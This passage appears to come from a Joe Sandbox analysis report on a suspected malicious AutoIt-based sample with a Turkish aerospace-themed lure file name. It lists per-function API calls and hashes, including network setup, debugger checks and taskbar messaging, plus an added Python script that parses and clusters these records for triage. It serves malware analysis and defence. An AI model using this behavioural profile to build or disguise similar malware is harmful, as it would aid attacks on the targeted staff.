                                                                                                                                      • Part of subcall function 00FA1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FA1D73
                                                                                                                                      • Part of subcall function 00FA1D35: GetStockObject.GDI32(00000011), ref: 00FA1D87
                                                                                                                                      • Part of subcall function 00FA1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FA1D91
                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 01026C71
                                                                                                                                    • GetSysColor.USER32(00000012), ref: 01026C8B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                    • String ID: static
                                                                                                                                    • API String ID: 1983116058-2160076837
                                                                                                                                    • Opcode ID: 53c9b464fe1d9c42e2985bd6b18c32e78838475cfb96c3b829d9aec3175e71c1
                                                                                                                                    • Instruction ID: ce7431ca93015295eaa23fa71ca943cfd34fdda80ce088d85b4fc12019afe58e
                                                                                                                                    • Opcode Fuzzy Hash: 53c9b464fe1d9c42e2985bd6b18c32e78838475cfb96c3b829d9aec3175e71c1
                                                                                                                                    • Instruction Fuzzy Hash: A9211472A1021AAFDB15DFA8C845AFA7BB8FB08354F104629FD95D3240D63AE8509B60
                                                                                                                                    APIs
                                                                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 010269A2
                                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 010269B1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                                                                    • String ID: edit
                                                                                                                                    • API String ID: 2978978980-2167791130
                                                                                                                                    • Opcode ID: 6cc8cb513df570de8bf8471e9db9d2f3463e0eabe80a2e1ba75b6dc2afe7bf9b
                                                                                                                                    • Instruction ID: f8da35558eda9242706d2528760d09ee4ec7a930f3e988e33c0f018abfc7f227
                                                                                                                                    • Opcode Fuzzy Hash: 6cc8cb513df570de8bf8471e9db9d2f3463e0eabe80a2e1ba75b6dc2afe7bf9b
                                                                                                                                    • Instruction Fuzzy Hash: FE116A71600229ABEB618E68DC44EEB3BADEB053B4F504754FEE1961D0CA36DC519BA0
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 01002A22
                                                                                                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 01002A41
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InfoItemMenu_memset
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 2223754486-4108050209
                                                                                                                                    • Opcode ID: e040526ae10db117857e6765a4d8e173d387286c7f584468b3bd68231c70fe8c
                                                                                                                                    • Instruction ID: dfa69ec7a49176f8699b7b6a4f76543d38eb7739b913d96bd5f97141604c1fd1
                                                                                                                                    • Opcode Fuzzy Hash: e040526ae10db117857e6765a4d8e173d387286c7f584468b3bd68231c70fe8c
                                                                                                                                    • Instruction Fuzzy Hash: FF11B932901124ABFF76DE5CDC48BAE77F8AB46390F044091E9D5E72D0DB70A945C791
                                                                                                                                    APIs
                                                                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0101222C
                                                                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 01012255
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$OpenOption
                                                                                                                                    • String ID: <local>
• API String ID: 942729171-4266983199
• Opcode ID: e8c830abdb727596e3042fd06fd25bf072986419793d31b5bac66407ccd66aa4
• Instruction ID: 30191efc4627eecfa95bbd29f593842300d289fb36375a9199dcc2aa46e9ea2a
• Opcode Fuzzy Hash: e8c830abdb727596e3042fd06fd25bf072986419793d31b5bac66407ccd66aa4
• Instruction Fuzzy Hash: 75110270501225FADB258F158C88EFFFFA8FF06291F20826AFA8486004E2785894C6F0
APIs
  • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
  • Part of subcall function 00FFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FFAABC
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00FF8E73
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: 0836eba57d078cdc858a76bab9d0656f6f91a868c4f704401484bce6bd8a0f7f
• Instruction ID: 2ffc7940531c02fee8533ab013164aa29f6c58844a24a0d88aee2a14bcdc9efd
• Opcode Fuzzy Hash: 0836eba57d078cdc858a76bab9d0656f6f91a868c4f704401484bce6bd8a0f7f
• Instruction Fuzzy Hash: 8701F1B1A41219AB8B14EBE0CC41DFE7368EF0A360B100A09F9656B2E1DE39580CE650
APIs
  • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
  • Part of subcall function 00FFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FFAABC
• SendMessageW.USER32(?,00000180,00000000,?), ref: 00FF8D6B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: de07283268f517d01a373784b78dbb0c230a17165a78e92445898c27c11f5d12
• Instruction ID: 0e828ea2e0427c75c59f2ef43c025e7fc0375ee54f7d1e906345f63624ec73a6
• Opcode Fuzzy Hash: de07283268f517d01a373784b78dbb0c230a17165a78e92445898c27c11f5d12
• Instruction Fuzzy Hash: AB01D4B1A4110DABCB24EBA0CD52EFF77A8DF1A390F100019B905672A1DE195E0CF271
APIs
  • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
  • Part of subcall function 00FFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FFAABC
• SendMessageW.USER32(?,00000182,?,00000000), ref: 00FF8DEE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: 39162f0c839a42932ab8ee16182d05eddbb600b7472916f7a77b6ad2c3a7373c
• Instruction ID: 47d21ac87dbd655b76759542a53931bd4f88f30530b99acd26f28bb746a1b8a4
• Opcode Fuzzy Hash: 39162f0c839a42932ab8ee16182d05eddbb600b7472916f7a77b6ad2c3a7373c
• Instruction Fuzzy Hash: 8401A2B1A4110DA7DB25EBA4CD42EFF77ACDF16390F100019B945A72A2DE298E0DF271
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: ClassName_wcscmp
• String ID: #32770
• API String ID: 2292705959-463685578
• Opcode ID: 5b3dc64a906d3b9e2111922a2256f7cc586a83f9fd2c49008a608eb57cd7dd0d
• Instruction ID: 6fe23d54de6d20e493c9998c278bcf2140407e5cf80e333c5cd41b2698f15c8a
• Opcode Fuzzy Hash: 5b3dc64a906d3b9e2111922a2256f7cc586a83f9fd2c49008a608eb57cd7dd0d
• Instruction Fuzzy Hash: 49E0D8336002292BE730AA9AAC4AFA7F7FCEB45B70F01005BFD44D7041D565AB4587E0
APIs
  • Part of subcall function 00FDB314: _memset.LIBCMT ref: 00FDB321
  • Part of subcall function 00FC0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00FDB2F0,?,?,?,00FA100A), ref: 00FC0945
• IsDebuggerPresent.KERNEL32(?,?,?,00FA100A), ref: 00FDB2F4
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00FA100A), ref: 00FDB303
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00FDB2FE
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• API String ID: 3158253471-631824599
• Opcode ID: 00b2df782733cf215fef82e628c503579a61314b41128271e941c502de66cbd8
• Instruction ID: 3987e6fc83d0ca67511c2f8893248d23edd2c54a569be5f9b96fdd37f6ca7d19
• Opcode Fuzzy Hash: 00b2df782733cf215fef82e628c503579a61314b41128271e941c502de66cbd8
• Instruction Fuzzy Hash: B1E065B0600302CBD7309F29E9047427AE8AF01794F058A6EE486C7745EBB9E408EBA1
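The per-function records in this part of the report (the APIs and Similarity blocks written by the Joe Sandbox IDA plugin) are easier to triage in bulk than by scrolling: functions that share an API String ID are near-duplicates, and the raw hex in the SendMessageW/PostMessageW argument lists becomes readable once the window-message constants are resolved. The script below is an added example, not code from the report or from Joe Sandbox: it parses such records, resolves the message constants the records above use (0x180 LB_ADDSTRING, 0x182 LB_DELETESTRING, 0x1A2 LB_FINDSTRINGEXACT, 0x111 WM_COMMAND, values from winuser.h), and groups functions by API String ID. The record layout is inferred from the lines shown on this page, and the sample text is a constructed subset of them. One caveat worth carrying into the triage: the IsDebuggerPresent/OutputDebugStringW pair in the CAtlBaseModule record is the ATL module constructor's own error path (it emits that string only when a debugger is attached and the critical section could not be initialised), so that record alone is not evidence of deliberate anti-debugging.

```python
"""Parse Joe Sandbox IDA-plugin function records and cluster them.

Added example; the record layout is inferred from the report lines on
this page, and SAMPLE below is a constructed subset of those lines.
"""
import re
from collections import defaultdict

# uMsg values the report prints as raw hex in Send/PostMessageW calls (winuser.h).
WINDOW_MESSAGES = {
    0x0111: "WM_COMMAND",
    0x0180: "LB_ADDSTRING",
    0x0182: "LB_DELETESTRING",
    0x01A2: "LB_FINDSTRINGEXACT",
}

# "• [Part of subcall function XXXX: ]Api.Module(args), ref: ADDR" or, for CRT
# helpers, "• _memmove.LIBCMT ref: ADDR" with no argument list.
API_CALL = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<api>[A-Za-z_0-9]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)
FIELD = re.compile(
    r"^\s*•\s*(?P<key>API ID|String ID|API String ID|Opcode ID|Instruction ID):\s*(?P<val>.*)$"
)

def decode_message(args):
    """Second Send/PostMessage argument is uMsg; name it when known, else keep hex."""
    if len(args) < 2 or args[1].strip() == "?":
        return "?"  # the report prints '?' for arguments it could not recover
    msg = int(args[1].strip(), 16)
    return WINDOW_MESSAGES.get(msg, f"0x{msg:04X}")

def parse_records(text):
    """Split the report text into one dict per function (each starts at 'APIs')."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"apis": [], "messages": []}
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_CALL.match(line)
        if m:
            args = m["args"].split(",") if m["args"] is not None else []
            call = {"api": m["api"], "module": m["mod"], "args": args,
                    "ref": m["ref"], "subcall": bool(m["sub"])}
            cur["apis"].append(call)
            # Only resolve messages the function sends itself, not its callees'.
            if call["api"] in ("SendMessageW", "PostMessageW") and not call["subcall"]:
                cur["messages"].append(decode_message(args))
            continue
        m = FIELD.match(line)
        if m:
            cur[m["key"]] = m["val"].strip()
    return records

def cluster_by_api_string_id(records):
    """Map API String ID -> list of (truncated) Opcode IDs sharing it."""
    clusters = defaultdict(list)
    for r in records:
        if "Opcode ID" in r:  # a record cut off before its Opcode ID is skipped
            clusters[r.get("API String ID", "?")].append(r["Opcode ID"][:12])
    return dict(clusters)

# Constructed subset of the records shown on this page.
SAMPLE = """\
APIs
  • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
  • Part of subcall function 00FFAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FFAABC
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00FF8E73
Strings
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: 0836eba57d078cdc858a76bab9d0656f6f91a868c4f704401484bce6bd8a0f7f
APIs
  • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
• SendMessageW.USER32(?,00000180,00000000,?), ref: 00FF8D6B
Similarity
• API String ID: 372448540-1403004172
• Opcode ID: de07283268f517d01a373784b78dbb0c230a17165a78e92445898c27c11f5d12
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,00FA100A), ref: 00FDB2F4
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00FA100A), ref: 00FDB303
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00FDB2FE
Similarity
• API String ID: 3158253471-631824599
• Opcode ID: 00b2df782733cf215fef82e628c503579a61314b41128271e941c502de66cbd8
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0102596E
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 01025981
Similarity
• API String ID: 529655941-2988720461
• Opcode ID: 17063db6c6b375b2ff699424e1eb5a6292a36656b11ebc7b08156171400e3296
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in recs:
        print(r.get("Opcode ID", "?")[:12], [c["api"] for c in r["apis"]], r["messages"])
    for sid, funcs in cluster_by_api_string_id(recs).items():
        print(sid, funcs)
```

Run against a saved copy of the report's disassembly section, the clusters show which of the hundreds of records are the same AutoIt runtime helper compiled for ComboBox and ListBox controls, and the resolved message names separate routine control manipulation (LB_ADDSTRING, LB_FINDSTRINGEXACT) from the WM_COMMAND posted to Shell_TrayWnd, which is the one worth a closer look.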
APIs
• GetSystemDirectoryW.KERNEL32(?), ref: 00FE1775
  • Part of subcall function 0101BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00FE195E,?), ref: 0101BFFE
  • Part of subcall function 0101BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0101C010
• FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00FE196D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Library$AddressDirectoryFreeLoadProcSystem
• String ID: WIN_XPe
• API String ID: 582185067-3257408948
• Opcode ID: 0576f6870819b6901b27acecfa7d0459addbe2d2a18847922701d8209a490619
• Instruction ID: 5c9a39efadd74ec8dafc6329771c6c908db397f8d09cd61e52d19ebb165bec2e
• Opcode Fuzzy Hash: 0576f6870819b6901b27acecfa7d0459addbe2d2a18847922701d8209a490619
• Instruction Fuzzy Hash: 33F0EDB1801149DFDB25DF92C594BECBBF8BB18701F640089E142A2194DB764F88EF60
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0102596E
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 01025981
  • Part of subcall function 01005244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 010052BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 17063db6c6b375b2ff699424e1eb5a6292a36656b11ebc7b08156171400e3296
• Instruction ID: 56922b281b37a31d82cc4fb86904661d7fed76037d2f6615d19db82c8a0d2fc0
• Opcode Fuzzy Hash: 17063db6c6b375b2ff699424e1eb5a6292a36656b11ebc7b08156171400e3296
• Instruction Fuzzy Hash: 3DD0C931384312B6E6B4BA719C0EFD77A24AF14B90F100829BBC9AA1C4C9F59800CB54
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 010259AE
• PostMessageW.USER32(00000000), ref: 010259B5
  • Part of subcall function 01005244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 010052BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 86d8c3961d21362fec569b6e1f8d28829ca90c0f026d6a55d7d4082bfa5618a2
• Instruction ID: 1a12597c1c7201f9bccd8c9dcdec4010ad85c1f96ff333ccbbfe9a7e752686f4
                                                                                                                                    • Opcode Fuzzy Hash: 86d8c3961d21362fec569b6e1f8d28829ca90c0f026d6a55d7d4082bfa5618a2
                                                                                                                                    • Instruction Fuzzy Hash: 3DD0C9313803127AE6B5BA719C0EFD77624AF15B90F100829BBC5AA1C4C9F5A800CB54